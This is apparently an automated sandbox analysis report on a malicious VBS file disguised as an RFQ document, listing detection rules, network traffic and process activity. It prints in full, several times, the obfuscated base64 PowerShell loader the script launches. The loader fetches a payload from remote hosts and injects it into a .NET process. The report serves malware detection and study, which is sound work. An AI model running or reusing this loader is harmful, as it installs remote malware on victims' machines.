J29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", ProcessId: 5964, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs", ProcessId: 5964, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbmm source: powershell.exe, 00000006.00000002.1417277961.00000217AB776000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1417277961.00000217AB706000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1417277961.00000217AB6C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1nr source: powershell.exe, 00000006.00000002.1417277961.00000217AB776000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1422770948.00000217AB970000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbL source: powershell.exe, 00000006.00000002.1417277961.00000217AB706000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A46CD000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bsnk.txt HTTP/1.1Host: pub-6346c84860d5480393a1799fb277dfdc.r2.devConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 172.66.0.235 172.66.0.235
              Source: Joe Sandbox ViewIP Address: 172.66.0.235 172.66.0.235
              Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bsnk.txt HTTP/1.1Host: pub-6346c84860d5480393a1799fb277dfdc.r2.devConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: pub-6346c84860d5480393a1799fb277dfdc.r2.dev
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
              Source: powershell.exe, 00000002.00000002.1433370924.000002658009C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217936B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1422770948.00000217AB9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.J.
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1433370924.0000026580023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000002.00000002.1433370924.0000026580069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217936B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793F7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arXJW
              Source: powershell.exe, 00000006.00000002.1381774221.000002179497E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev/bsnk.txt
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793A8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: powershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.7:49700 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5220, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAACD006446_2_00007FFAACD00644
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAACD000136_2_00007FFAACD00013
              Source: RFQ 2024.09.26-89 vivecta.vbsInitial sample: Strings found which are bigger than 50
              Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5220, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6/5@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he5jyahw.re5.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs"
